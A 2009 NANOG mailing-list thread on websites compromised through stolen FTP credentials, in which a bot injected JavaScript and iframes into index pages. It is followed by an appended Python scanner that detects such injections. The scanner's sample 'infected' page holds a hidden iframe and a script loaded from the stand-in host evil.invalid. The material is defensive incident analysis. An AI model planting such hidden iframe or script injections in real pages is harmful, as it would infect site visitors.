nanog mailing list archives

RE: Malicious code just found on web server


From: "Chuck Schick" <chasjs () warp8 com>
Date: Tue, 21 Apr 2009 11:51:16 -0600

We have seen this twice recently... we have tracked it back to a worm which
steals unencrypted FTP information from a desktop. We tracked it down
because it occurred on 7 or 8 sites that were on different servers, both Linux
and Windows; some had no database associated with them. The only common
thing on these sites was they all had the same web developer. She confirmed
she was using FileZilla, which does not encrypt the passwords; she also
confirmed that she had found a virus/worm on her machine a few weeks before.
The same thing was found on other websites that she maintained that we did
not host. FTP logs confirmed that a bot was making the changes through FTP.

The bot seems to inject JavaScript and an IFrame into all pages that are named
index.* - it changed html, php and asp extensions.

Chuck Schick
Warp 8, Inc.
(303)-421-5140
www.warp8.com   

-----Original Message-----
From: Mike Lewinski [mailto:mike () rockynet com] 
Sent: Monday, April 20, 2009 11:23 AM
To: nanog () nanog org
Subject: Re: Malicious code just found on web server


Paul Ferguson wrote:

> Most likely SQL injection. At any given time, there are hundreds of
> thousands of "legitimate" websites out there that are unwittingly
> harboring malicious code.

Most of the MS-SQL injection attacks we see write malicious JavaScript into
the DB itself so all query results include it. However, I'm not sure how
easy it is to leverage to get system access - we've seen a number of
compromised customer machines and there didn't appear to be any further
compromise of them beyond the obvious. In the OP's case it sounds like
static HTML files were altered. My bet is that an FTP or SSH account was
brute-forced.

Mike
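A defender-side check for the symptom Chuck describes above (JavaScript and an IFrame injected into every index.* page, regardless of html/php/asp extension). This is an added example, not code from either poster or from NANOG; the web root layout, the sample pages, the allowlisted script hosts and the `evil.invalid` host are all constructed for illustration.

```python
"""Scan index.* pages under a web root for injected hidden iframes and
scripts loaded from hosts the site does not normally use.

Added example for the thread above; not code from the list posters.
Web root layout, sample pages and the allowlist are constructed.
"""
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts whose scripts the site legitimately loads (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

# The thread reports changes to index.html, index.php and index.asp alike.
INDEX_PATTERN = re.compile(r"^index\.(html?|php|asp)$", re.IGNORECASE)


class InjectionFinder(HTMLParser):
    """Collect iframes that are hidden or zero-sized, and script tags whose
    src points at a host outside ALLOWED_SCRIPT_HOSTS."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (
                a.get("width", "").strip() in ("0", "1")
                or a.get("height", "").strip() in ("0", "1")
                or "display:none" in style
                or "visibility:hidden" in style
            )
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host and host.lower() not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append(("external-script", a["src"]))


def scan_html(text):
    """Return a list of (kind, src) findings for one page's markup."""
    parser = InjectionFinder()
    parser.feed(text)
    return parser.findings


def scan_webroot(root):
    """Walk `root` and return {relative_path: findings} for every index.*
    page that has at least one finding. Paths use '/' regardless of OS."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not INDEX_PATTERN.match(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_html(fh.read())
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed sample pages. The infected one shows the pattern from the
# thread: a zero-sized, hidden iframe plus a script pulled from a foreign host.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example.com/site.js"></script>
</head><body><h1>Welcome</h1></body></html>"""

INFECTED_PAGE = CLEAN_PAGE + """
<iframe src="http://evil.invalid/in.cgi" width=0 height=0 style="display:none"></iframe>
<script src="http://evil.invalid/x.js"></script>"""


def demo():
    """Build a throwaway web root with one clean and one infected site,
    then scan it. Returns the report dict."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "siteA"))
    os.makedirs(os.path.join(root, "siteB"))
    with open(os.path.join(root, "siteA", "index.html"), "w") as fh:
        fh.write(CLEAN_PAGE)
    # PHP prologue is handled by the parser as a processing instruction.
    with open(os.path.join(root, "siteB", "index.php"), "w") as fh:
        fh.write("<?php include 'hdr.php'; ?>\n" + INFECTED_PAGE)
    return scan_webroot(root)


if __name__ == "__main__":
    for page, hits in demo().items():
        for kind, src in hits:
            print(f"{page}: {kind} -> {src}")
```

Pointing `scan_webroot` at a real document root will flag every index.* page that loads script from an unlisted host or embeds a hidden frame; widening `INDEX_PATTERN` to all html/php/asp files checks the rest of the site. Since the thread attributes the changes to stolen FTP credentials rather than a server-side hole, the companion step is to correlate any hit with FTP log entries for that path and rotate the affected account's password.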
